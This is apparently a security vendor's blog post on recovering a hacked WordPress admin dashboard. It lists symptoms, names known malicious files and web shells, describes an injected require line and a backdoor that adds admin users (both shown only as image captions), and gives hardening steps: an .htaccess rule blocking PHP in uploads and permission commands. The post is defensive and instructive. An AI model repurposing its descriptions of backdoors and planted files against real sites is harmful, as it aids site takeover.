How to fix WordPress admin dashboard (wp-admin) hack

One of the worst feelings you can experience as a website owner is finding out that your website has been hacked. If proactive security measures are not taken – a hacker may be able to launch Pharma attacks, Phishing pages, Japanese SEO spam, Redirection Malware etc. through WordPress Admin panel hack.

A new type of wp-admin hack has surfaced which adds an unauthorized WordPress admin user and infects the site with a pharma hack. The typical consequences of such a hack include complete website takeover, data theft, compromise of database and SEO hijacking. The WordPress admin is the most crucial part of your website. Getting locked out of the admin would mean losing access to your website.

What are the symptoms of the wp-admin hack?

Typical symptoms of WordPress admin panel hack are:

  1. Admin users have been created in WordPress which you are not aware of
  2. WordPress Pharma hacked pages being indexed in Google.
  3. New web pages added to your website with Japanese text (Japanese SEO spam pages).
  4. The suspicious looking base64 encoded code in the theme/core files.
  5. Core WordPress files have been modified.
    WordPress Admin panel Hacked? Drop us a message on the chat widget, and we’d be happy to help you fix it. Fix my WordPress website now.
  6. Unknown files like admin.php, adminer.php are found in the /public_html folder or /public_html/wp-admin folder.
  7. Hacked wp-admin loads different UI.
  8. When you visit the wp-admin page, instead of the login page you see a black/grey screen with a list of files on the server.
  9. After logging in to WordPress admin area, you see a grey screen with a list of files on the server.
  10. PHP internal 500 error on visiting wp-admin or, after logging in.
  11.  ‘Anyone can register’ option has been enabled from the Settings » General page section in the WordPress admin area.
  12. Hundreds of spam WordPress users have been created.
  13. You are unable to add/delete plugins.
  14. WordPress Security plugins automatically get disabled.
  15. Blank page when you visit the admin area.
  16. WordPress website becomes very slow.
  17. Your Hosting provider suspends your account.
  18. A web shell is uploaded.
  19. A file Manager named ‘B Ge Team File Manager’ is uploaded.
B G Team file manager WordPress hack
File manager uploaded by the Hacker

How to remove the WP-ADMIN malware code from my website?

1. Check index.php, wp-admin/index.php to see if they have been modified. Usually, the following line of code is added to the top of the index.php file:

Malicious code included - wp-admin hack

The file being ‘required’/’included’ here contains malicious code which is executed along with each run of WordPress. Such code can generate fake pharma pages, Japanese SEO spam pages and other malware infections.

WordPress admin dashboard hacked? Drop us a message on the chat widget, and we’d be happy to help you fix it. Fix my WordPress website now.

Delete the @require code from the file after comparing it with the contents of the core WP files from its GitHub repository.

A screenshot of the malicious file can be seen below:

Malicious File contents

2. Check if there are any new files in the root of the server or /wp-admin folder that were not created by you. Some files that you may find are:

  1. Marvins.php
  2. db_.php
  3. 8c18ee
  4. 83965
  5. admin.php
  6. buddy.zip
  7. dm.php

If you find any of the above suspicious files, take a backup and delete them. A standard WordPress installation generally has the following files in the root of the server:

WordPress files in the root of server

3. Perform a Google search to see the list of pages indexed for your domain:

site: <enter your domain name>

Japanese SEO Spam in Google Search Results

If the search results for your website are similar to the screenshot above, please refer to the Japanese SEO spam removal guide.

4. Delete unknown WordPress administrator accounts from the users page

Visit the users page (wp-admin/users.php?role=administrator) in your WordPress website to see if any new administrator users have been added. Immediately delete the accounts you do not recognize.

5. Run a malware scan on all files on your server

In your web-hosting dashboard or cPanel, you should have an option called ‘Virus Scanner’. Run it to identify any malicious files which may be residing on the server. Verify and delete any files that it flags.

If you are an Astra customer, please login to your dashboard and initiate a malware scan from the top menu.

6. Delete PHP files that are found in the ‘uploads‘ directory.

Due to security vulnerabilities in WordPress plugins or in the core itself, a hacker may be able to upload malicious PHP files to the web server. If you find any executable files with the .php, .php3, .php4, .php5, .py, .asp, .aspx file extension anywhere in the /uploads directory, immediately delete them.

You can also prevent PHP execution in this directory by placing an .htaccess at the root of /uploads using:

# Kill PHP Execution
<Files ~ "\.ph(?:p[345]?|t|tml)$">
   deny from all
</Files>

7. Find backdoor script which adds an admin user to your WordPress website

Once the WordPress backdoor is executed, the hacker is able to insert a new WordPress user with Administrator role. Further, this can be used to regain access to the WordPress installation at any time the hacker wants.

WP Admin Backdoor Script

Steps to prevent a re-infection & Identify cause

1. Install a web application firewall which would detect security threats and block them

While WordPress is built with security in mind, it’s plugins are often subjected to all kinds of security threats. And hence, it is important to proactively secure your WordPress website from the 100s of new threats lurking out there. Security suite’s such as Astra, ensure that you are safe from such targeted attacks.

WordPress admin dashboard hacked? Drop us a message on the chat widget, and we’d be happy to help you fix it. Fix my WordPress website now.

2. Regularly update the WordPress core, plugins and themes

The security landscape changes everyday making it critical to update your WordPress core, plugins and themes immediately to ensure that all patches are successfully installed. Hackers and cyber-criminals often build tools to exploit known vulnerabilities in plugins. This is the easiest way to get hacked!

3. Monitor administrator accounts being created in WordPress

In a typical store compromise, hackers create admin users for themselves to be able to access the WordPress backend/admin area at a later stage. Be proactive with this step and follow the Principle of the least privilege.

4. Take regular backups of WordPress files & Database

Configure automatic backups which archive all the files on the server and also the database. These backups should be stored on an external server so that in the event of a hack, the backups can still be retrieved.

5. Update file & folder permissions on the server

The default permission scheme should be:

  • Folders – 755
  • Files – 644

You can change the file permissions recursively via command line:

For Directories:

find /path/to/your/wordpress/install/ -type d -exec chmod 755 {} \;

For Files:

find /path/to/your/wordpress/install/ -type f -exec chmod 644 {} \;

6. Disable File Editing
It is recommended to disable file editing within the WordPress dashboard. Append the following two lines to the end of your wp-config.php file to disable file editing via the WordPress dashboard:

## Disable Editing in Dashboard
define('DISALLOW_FILE_EDIT', true);

Here’s a complete video that you need to follow step by step to secure your WordPress site.

About Astra Security Suite

Astra is the essential web security suite that fights hackers, internet threats & bots for you. We provide proactive security for your websites running popular CMSs like WordPress, OpenCart, Magento etc. Our professional malware removal team is available 24×7 throughout the year to help you regain your hacked website and quickly get back to business. We’d love to help!

Take an Astra demo now!

Web Application Firewall Magento, Opencart Prestashop

Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

Ananda Krishna

Ananda is a security researcher at Astra.

3 Comments

  1. Jose.mcdonald@turbineblades.co.uk - Reply

    Great article!

  2. I’m impressed, I have to say. Really not often do I encounter a blog that’s both educative and entertaining, and let me let you know, you’ve gotten hit the nail on the head. Your concept is outstanding; the problem is something that not sufficient persons are speaking intelligently about.

  3. Thankyou for your great article. My site got hacked like what you described in this article. In my case, I found them in wp-config.php file.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close